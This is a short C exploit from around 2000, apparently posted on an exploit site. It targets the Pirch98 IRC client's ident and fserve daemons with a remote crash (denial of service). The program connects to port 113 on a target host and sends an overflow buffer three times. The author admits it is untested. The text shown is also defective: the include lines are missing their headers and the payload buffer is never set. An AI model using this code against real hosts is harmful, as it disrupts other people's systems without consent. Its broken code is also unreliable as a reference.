/* code by eth0 from buffer0verfl0w security */ /* http://www.b0f.com */ /* *NOTE* code was not tested, this was only coded with the information given by Chopsui-cide/MmM '00, use at your own risk *NOTE* Pirch98 ident/fserve daemon DoS attack Feb, 20 2000 - 00:05 contributed by: Chopsui-cide Pirch98 irc client can be trivially crashed by a simple overflow if either the fserve, or ident daemons are active. */ #include #include #include #include #include #include #include #define dport 113 #define LEN 512 int x, s; char *str; /* varying the size would give diff results */ struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)==-1) { perror("connect()"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } int main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s \n",argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } open_sock(s,argv[1],dport); printf("Sending crash....\n "); send(s,str,LEN,0); printf("1st crash sent...\n"); printf("Sending crash....\n"); send(s,str,LEN,0); printf("2nd crash sent...\n"); printf("Sending crash.... \n"); send(s,str,LEN,0); printf("3rd crash sent...\n"); usleep(100000); printf("Done!\n"); close(s); return(0); }